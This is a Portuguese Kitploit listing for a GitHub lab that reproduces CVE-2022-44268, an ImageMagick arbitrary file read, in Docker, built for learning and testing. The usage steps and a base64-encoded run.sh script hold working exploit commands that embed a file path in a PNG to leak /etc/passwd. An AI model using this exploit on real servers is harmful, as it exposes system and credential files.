Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment — The vulnerable recurrence docker environment for CVE-2022-44268 | Kitploit
Ferramentas/GitHubGitHub/y1nglamore/cve-2022-44268-imagemagick-vulnerable-docker-environment
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHuby1nglamore/cve-2022-44268-imagemagick-vulnerable-docker-environment

CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment

The vulnerable recurrence docker environment for CVE-2022-44268

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
102há 3 anosAinda não revisado

CVE-2022-44268 Leitura Arbitrária de Arquivos Locais do ImageMagick

https://www.metabaseq.com/imagemagick-zero-days/

Baseado no PoC CVE-2022-44268 ImageMagick Arbitrary File Read PoC, criei um ambiente de teste de vulnerabilidade usando Docker.

Uso

root@kitploit:~
# obter imagem
docker pull y1nglamore/cve_2022_44268:latest # você também pode compilar a partir do Dockerfile

# executar contêiner
docker run --rm -i -t y1nglamore/cve_2022_44268 /bin/bash

Depois disso, você será colocado dentro do contêiner. Usando ./run.sh CAMINHO_DO_ARQUIVO, o ImageMagick lerá o arquivo.

m1-155000_hh4Qzq

Por padrão, ./run.sh lerá /etc/passwd.

m1-155130_56zEuO

Alternativamente, você pode executar manualmente o seguinte comando:

root@kitploit:~
pngcrush -text a "profile" "/etc/passwd" 1.png
exiv2 -pS pngout.png
convert pngout.png gopro.png

identify -verbose gopro.png

Dockerfile

root@kitploit:~
FROM ubuntu:20.04

RUN apt update --allow-insecure-repositories
RUN apt-get install pngcrush  -y --allow-unauthenticated
RUN apt-get install imagemagick  -y --allow-unauthenticated
RUN apt-get install  exiftool exiv2 wget -y --allow-unauthenticated
RUN apt-get install xxd -y   --allow-unauthenticated

WORKDIR /root
RUN wget http://cdn2.pic.y1ng.vip/uPic/2023/02/03/m1-145410_1.png -O 1.png
RUN echo 'IyEvYmluL2Jhc2gKCmlmIFsgLXogIiQxIiBdOyB0aGVuCiAgICBmaWxlPSIvZXRjL3Bhc3N3ZCIKZWxzZQogICAgZmlsZT0iJDEiCmZpCgpwbmdjcnVzaCAtdGV4dCBhICJwcm9maWxlIiAiJGZpbGUiIDEucG5nIApleGl2MiAtcFMgcG5nb3V0LnBuZyAKY29udmVydCBwbmdvdXQucG5nIGdvcHJvLnBuZyAKCmlkZW50aWZ5IC12ZXJib3NlIGdvcHJvLnBuZyB8IGdyZXAgLWUgIl5bMC05YS1mXSokIiB8ICBncmVwIC4gfCB4eGQgLXIgLXAK' | base64 -d > run.sh 
RUN chmod +x run.sh

CMD sleep infinity

Referência e Agradecimentos

https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC

Baixar ferramenta